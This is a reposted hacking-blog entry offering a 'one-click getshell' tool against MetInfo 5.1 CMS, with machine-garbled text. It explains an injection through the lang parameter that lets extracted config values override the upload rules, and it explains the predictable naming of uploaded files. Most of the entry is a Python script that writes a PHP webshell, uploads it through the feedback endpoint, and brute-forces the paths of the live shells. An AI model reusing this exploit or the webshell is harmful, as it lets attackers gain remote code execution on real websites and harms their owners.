title:metinfo V5.1Getshell One-click Tool Date:2016-06-08 22:40:32Categories:hackertags:-Hacker-Tools-------------#Vulnerability Resolution:----------**config/config.inc.php**"' Php$langoks= $db->get_one ("SELECT * from $met _lang WHERE lang= ' $lang '");if(! $langoks) Die ('No Data in the database,please reinstall.');if(! $langoks [useok]&&! $metinfoadminok) Okinfo ('.. /404.html');if(Count ($met _langok) ==1) $lang =$met _index_type; $query="SELECT * from $met _config WHERE lang= ' $lang ' or lang= ' Metinfo '";//look at this $result .= $dbquery ($query); while($list _config= $dbFetch_array ($result)) { if($metinfoadminok) $list _config['value']=str_replace ('"','& #34;', Str_replace ("'",'& #39;', $list _config['value'])); $settings _arr[]=$list _config; if($list _config['ColumnID']) {$settings [$list _config['name'].'_'. $list _config['ColumnID']]= $list _config['value']; }Else{$settings [$list _config['name']]= $list _config['value']; }} @extract ($settings);----------<!--more-->To Access http:localhost/metinfo5.1/index.php?lang=metinfo ' SELECT* FROM Met_config WHERE lang='Metinfo' orlang='Metinfo'`----------## File naming method:----------**/feedback/uploadfile_save.php**"' Phpsrand (Double) microtime ()* 1000000); $rnd= rand (100, 999); $name= Date ('U') +$rnd; $name= $name.".". $ext; "* * File saved in/upload/file/directory * *The naming method is that the timestamp is removed after three bits, followed by a three-digit random number can be exploded: http:127.0.0.1/upload/file/1465394396. PHP----------#One-click Use tool:----------* * This program is written based on Python * *"' python#!/usr/bin/env python#-*-coding:utf-8-*-ImportRequestsImportQueueImportThreadingImport TimeImportsysheaders= {'user-agent':'mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/52.0.2743.10 safari/537.36'}urls=Queue.queue ()#http://hb.jhxjd.com/upload/file/1441445378.phpdefBP (urls,time_out): while noturls.empty (): Base_url=Urls.get () response=NoneTry: Time.sleep (int (time_out))#Delay SettingResponse = Requests.get (base_url,headers=headers)ifResponse.status_code = = 404: Print 'Not fount----%s'%Base_urlexcept: Continue finally: ifResponse:with Open ('Url.txt','A +') as F:f.write ('%s?e=yxnzzxj0'%Base_url)defMain (target_url,thread_num,time_out):#Remove the current timestamp and delete the post four bitsnow = str (int (time.time ())) [:-4] #traverse all the pending addresses and join the queue forIinchRange (0,10): forJinchRange (100,1000): Num_str="'. Join ((str (i), str (j))) URL="'. Join ('%s/upload/file/%s'% (Target_url,now), Num_str,'. PHP') ) urls.put (URL)#Uploading FilesWith open ('xiaoma.php','w+') as Fi:fi.write ("<?php $e = $_request[' E '];register_shutdown_function (Base64_decode ($e), $_request[' Akkuman ']);? >") Data= { 'Fd_para[1][para]':'Filea', 'Fd_para[1][type]':'5'} files= {'Filea': Open ("xiaoma.php",'RB')} upload_url='%s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo'%Target_url Res= Requests.post (Upload_url,data = data,files=files)#wait two seconds for file uploadTime.sleep (2)
---reprint
hacktech.cn| 53xiaoshuo.com
Metinfo 5.1 Automated Getshell Tools